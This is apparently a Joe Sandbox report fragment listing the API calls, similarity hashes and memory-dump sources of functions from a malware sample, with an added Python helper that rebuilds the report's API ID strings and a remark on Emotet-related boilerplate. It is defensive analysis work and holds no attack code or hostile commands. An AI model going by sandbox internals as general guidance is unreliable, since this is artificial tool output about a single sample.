                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction ID: c96e7402d8f87136a9c376d92da51b645b4312610aa90fcb7a9bffc7d4a68029
                                                                  • Opcode Fuzzy Hash: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction Fuzzy Hash: 25518E70A04218EBDF21AFA6DC89DEFBBB9EF84354F24412BF415A2290D7345D91CB64
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00426D37
                                                                    • Part of subcall function 0040D93F: __EH_prolog.LIBCMT ref: 0040D944
                                                                  • GetCapture.USER32 ref: 0042750F
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427528
                                                                  • GetFocus.USER32 ref: 0042753A
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427546
                                                                  • GetLastActivePopup.USER32(?), ref: 0042756D
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427578
                                                                  • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042759C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                  • String ID:
                                                                  • API String ID: 2915395904-0
                                                                  • Opcode ID: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction ID: 19a528a7567d654ee424c3ff896293cafdfeef5f92fb810e1dffabcbd8df109d
                                                                  • Opcode Fuzzy Hash: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction Fuzzy Hash: 0541F071704228BFCB24AB65EC44E7FB6A9EF44384B60043FF101D3690CB78CC829669
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A83
                                                                  • GetLastError.KERNEL32(?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A97
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412AB9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76230A60,00000000,?,?,?,?,0040E927), ref: 00412AED
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B0F
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B28
                                                                  • GetEnvironmentStrings.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B3E
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00412B7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction ID: accb5785985df4b6819ef042d50e533d603ff3fa48001b7d390ff30f191b463a
                                                                  • Opcode Fuzzy Hash: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction Fuzzy Hash: 9F3159726082656FD7302F759EC48BBB78CEB45394715083BF142C3250E6E86CE582BD
                                                                  APIs
                                                                  • GlobalLock.KERNEL32(?), ref: 0041F256
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 0041F262
                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041F274
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F294
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F29C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0041F2A6
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041F2B3
                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041F2CB
                                                                    • Part of subcall function 0042663E: GlobalFlags.KERNEL32(?), ref: 00426648
                                                                    • Part of subcall function 0042663E: GlobalUnlock.KERNEL32(?,00000000,?,0041F2C5,?,00000000,?,?,00000000,00000000,00000002), ref: 00426659
                                                                    • Part of subcall function 0042663E: GlobalFree.KERNEL32(?), ref: 00426664
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                  • String ID:
                                                                  • API String ID: 168474834-0
                                                                  • Opcode ID: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction ID: 8fa5d7953f2ec37764842a3f19103b125725ee6fb1def39efba1f66d7d1e0517
                                                                  • Opcode Fuzzy Hash: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction Fuzzy Hash: 51110676200104BEDB216BA6CC45DAFBABDEF84700B50046EF605D1220D73AC992DB78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: 709adfc9c84f7bed254e0d089e0ae38cc9465eeb11da256b68669de6ba8dc5f6
                                                                  • Instruction ID: c3c1a4a0a74ef334ffef270d45007926b0fc61ba4346c4bbf4ceb0d3c24f7a67
                                                                  • Opcode Fuzzy Hash: 709adfc9c84f7bed254e0d089e0ae38cc9465eeb11da256b68669de6ba8dc5f6
                                                                  • Instruction Fuzzy Hash: 4BE1B0726243428BC718DFE4D498A7FB3E2ABC4744F14491DE48ACB348DB74E995CB92
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00404B4A
                                                                  • MapDialogRect.USER32(?,?), ref: 00404BD8
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00404BF9
                                                                  • CLSIDFromString.OLE32(?,00000004), ref: 00404CF7
                                                                  • CLSIDFromProgID.OLE32(?,00000004), ref: 00404CFF
                                                                  • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00404D9B
                                                                  • SysFreeString.OLEAUT32(?), ref: 00404DEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                  • String ID:
                                                                  • API String ID: 493809305-0
                                                                  • Opcode ID: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction ID: b3c49ecfdae2261962f2f72699b3bcc1d5c4594392ee8f9afc26f4e19ff51694
                                                                  • Opcode Fuzzy Hash: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction Fuzzy Hash: A1A146B1900219DFDB14DFA9D884AEEBBB4FF48304F10452EE919A7391D738A951CFA4
                                                                  APIs
                                                                    • Part of subcall function 00411DA5: GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                    • Part of subcall function 00411DA5: FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                    • Part of subcall function 00411DA5: FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                    • Part of subcall function 00411DA5: GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                    • Part of subcall function 00411DA5: SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A2D
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A86
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                  • String ID: ^@
                                                                  • API String ID: 223281555-3067454934
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0042184E
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421875
                                                                  • UpdateWindow.USER32(?), ref: 0042188F
                                                                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 004218B3
                                                                  • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004218CD
                                                                  • UpdateWindow.USER32(?), ref: 00421913
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421947
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  Similarity
                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                  • String ID:
                                                                  • API String ID: 2853195852-0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00406994
                                                                  • GetObjectA.GDI32(00405B22,0000003C,?), ref: 00406A00
                                                                  • lstrlenA.KERNEL32(?), ref: 00406A11
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00406A88
                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,00433CFC,?), ref: 00406AB4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                  • String ID:
                                                                  • API String ID: 4082312370-3916222277
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428795
                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00428875
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00428892
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 004288B2
                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004288CE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseEnumH_prologOpenQueryValue
                                                                  • String ID: Software\
                                                                  • API String ID: 2161548231-964853688
                                                                  APIs
                                                                  • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042CC28,000000FF), ref: 00403D06
                                                                  • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00403D6D
                                                                  • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00403D78
                                                                    • Part of subcall function 00403920: FindResourceA.KERNEL32(?,?,00000006), ref: 0040393A
                                                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 00403DB5
                                                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 00403DC9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                  • String ID: loopback
                                                                  • API String ID: 858472958-3546420730
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,00000000,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF), ref: 00429AA6
                                                                  • TlsGetValue.KERNEL32(0043F1A0,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429AC4
                                                                  • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940), ref: 00429B20
                                                                  • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3), ref: 00429B32
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B3F
                                                                  • TlsSetValue.KERNEL32(0043F1A0,00000000), ref: 00429B6F
                                                                  • LeaveCriticalSection.KERNEL32(0043F1BC,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B90
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                  • String ID:
                                                                  • API String ID: 784703316-0
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC48
                                                                  • GetParent.USER32(?), ref: 0040CC59
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC7C
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC8E
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0040CC9D
                                                                  • IsWindowVisible.USER32(?), ref: 0040CCB7
                                                                  • GetTopWindow.USER32(?), ref: 0040CCDD
                                                                  Similarity
                                                                  • API ID: Window$LongParentVisible
                                                                  • String ID:
                                                                  • API String ID: 506644340-0
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00429E03
                                                                  • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E26
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E42
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E52
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E5C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseCreate$Open
                                                                  • String ID: software
                                                                  • API String ID: 1740278721-2010147023
                                                                  APIs
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004051E1
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004051F9
                                                                  • GetSystemMetrics.USER32(00000001), ref: 00405200
                                                                  • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00405226
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                  • String ID: B$DISPLAY
                                                                  • API String ID: 2307409384-3316187204
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,00000000,?,?,?,?,00407746,?), ref: 00427E53
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427E8D
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E96
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  • MulDiv.KERNEL32(Fw@,00000060,000009EC), ref: 00427EBA
                                                                  • MulDiv.KERNEL32(00000000,?,000009EC), ref: 00427EC5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID: Fw@
                                                                  • API String ID: 696222070-2650048193
                                                                  APIs
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                    • Part of subcall function 00429F15: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                    • Part of subcall function 00429F15: LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429916: __EH_prolog.LIBCMT ref: 0042991B
                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,004290F1,0000000C), ref: 004228A4
                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 004228B7
                                                                  • FreeLibrary.KERNEL32(?), ref: 004228C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                  • String ID: HtmlHelpA$hhctrl.ocx$|C
                                                                  • API String ID: 813623328-2960013086
                                                                  • Opcode ID: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction ID: 8ff148b5d027a1bd9c09299d9886496cc310a26e86ad88824c01f6ca9606dbec
                                                                  • Opcode Fuzzy Hash: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction Fuzzy Hash: A6F04430344311EFD7606F72EE09B177AD4AF08B15F40892EF05BD15A0DBB8C844972A
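The "API ID" printed in each Similarity section above is derived mechanically from the function's API call list, which is what makes it usable for matching functions across reports of different samples. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: it parses the APIs section of a block in this listing and rebuilds the API ID. The rule it implements (split each API name at capital letters, drop tokens shorter than four characters such as Get, Sys, Set, Dlg, To, Is and the A/W suffix, count tokens across all listed calls including "Part of subcall" entries, group by count descending, sort alphabetically inside a group, join groups with "$") is inferred from the function blocks in this listing and is an assumption, not documented Joe Sandbox behaviour. The three sample blocks are copied from the listing with their argument lists shortened; the numeric API String ID hashes are not reproduced.

```python
import re
from collections import Counter

# Constructed samples: API call lists copied from three function blocks of the
# listing (argument lists shortened), each paired with the API ID the report prints.
SAMPLE_BLOCKS = {
    "hhctrl": ("""\
APIs
  • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(0043F21C,?,00000000), ref: 00429F43
  • Part of subcall function 00429F15: InitializeCriticalSection.KERNEL32(00000000,?), ref: 00429F55
  • Part of subcall function 00429F15: LeaveCriticalSection.KERNEL32(0043F21C,?), ref: 00429F5E
  • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(00000000,00000000), ref: 00429F70
  • Part of subcall function 00429916: __EH_prolog.LIBCMT ref: 0042991B
• LoadLibraryA.KERNEL32(hhctrl.ocx,004290F1,0000000C), ref: 004228A4
• GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 004228B7
• FreeLibrary.KERNEL32(?), ref: 004228C7
Strings
""", "CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc"),
    "syscolor": ("""\
APIs
• GetSysColor.USER32(0000000F), ref: 0042548A
• GetSysColor.USER32(00000010), ref: 00425491
• GetSysColor.USER32(00000014), ref: 00425498
• GetSysColor.USER32(00000012), ref: 0042549F
• GetSysColor.USER32(00000006), ref: 004254A6
• GetSysColorBrush.USER32(0000000F), ref: 004254B3
• GetSysColorBrush.USER32(00000006), ref: 004254BA
Memory Dump Source
""", "Color$Brush"),
    "exit": ("""\
APIs
• GetModuleHandleA.KERNEL32(mscoree.dll,0040F0D9,?), ref: 0040EF70
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF80
• ExitProcess.KERNEL32 ref: 0040EF94
Strings
""", "AddressExitHandleModuleProcProcess"),
}

# One bullet line of an APIs section: optional "Part of subcall" prefix, then Name.MODULE
API_CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
)
TOKEN_RE = re.compile(r"[A-Z][^A-Z]*")  # GetProcAddress -> Get, Proc, Address; __EH_prolog -> E, H_prolog
MIN_TOKEN_LEN = 4  # assumption inferred from the listing: Get, Sys, Set, Dlg, To, Is, A, W never appear in an ID


def parse_api_calls(block):
    """Return [(api_name, module), ...] for the bullet lines of a block's APIs section."""
    calls, in_apis = [], False
    for line in block.splitlines():
        text = line.strip()
        if text == "APIs":
            in_apis = True
            continue
        if text in ("Strings", "Memory Dump Source", "Similarity"):
            in_apis = False
        if not in_apis:
            continue
        m = API_CALL_RE.search(line)
        if m:
            calls.append((m["api"], m["module"]))
    return calls


def api_tokens(api_name):
    """Split an API name at capitals and keep only the tokens the report keeps."""
    return [t for t in TOKEN_RE.findall(api_name) if len(t) >= MIN_TOKEN_LEN]


def api_id(calls):
    """Rebuild the report's API ID: tokens grouped by call count (descending),
    alphabetical inside a group, groups joined with '$'."""
    counts = Counter(tok for api, _ in calls for tok in api_tokens(api))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def verify_all(samples=SAMPLE_BLOCKS):
    """Map sample name -> (computed API ID, whether it matches the ID printed in the report)."""
    result = {}
    for name, (block, expected) in samples.items():
        computed = api_id(parse_api_calls(block))
        result[name] = (computed, computed == expected)
    return result


if __name__ == "__main__":
    for name, (computed, ok) in verify_all().items():
        print(f"{name:9s} {'OK ' if ok else 'BAD'} {computed}")
```

Rebuilding the ID this way lets you compare functions from this report with blocks from reports of other samples, and it also makes runtime boilerplate stand out before it is mistaken for Emotet logic: the GetModuleHandleA(mscoree.dll) / GetProcAddress(CorExitProcess) / ExitProcess sequence is the Microsoft C runtime's process-exit path, present in any statically linked MSVC binary, so it should not be used as a detection feature on its own.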
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 0042548A
                                                                  • GetSysColor.USER32(00000010), ref: 00425491
                                                                  • GetSysColor.USER32(00000014), ref: 00425498
                                                                  • GetSysColor.USER32(00000012), ref: 0042549F
                                                                  • GetSysColor.USER32(00000006), ref: 004254A6
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004254B3
                                                                  • GetSysColorBrush.USER32(00000006), ref: 004254BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Color$Brush
                                                                  • String ID:
                                                                  • API String ID: 2798902688-0
                                                                  • Opcode ID: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction ID: 78561b53b6dc26605db7459fdb8494e68ce8eabe85823d8095c3e3f311011118
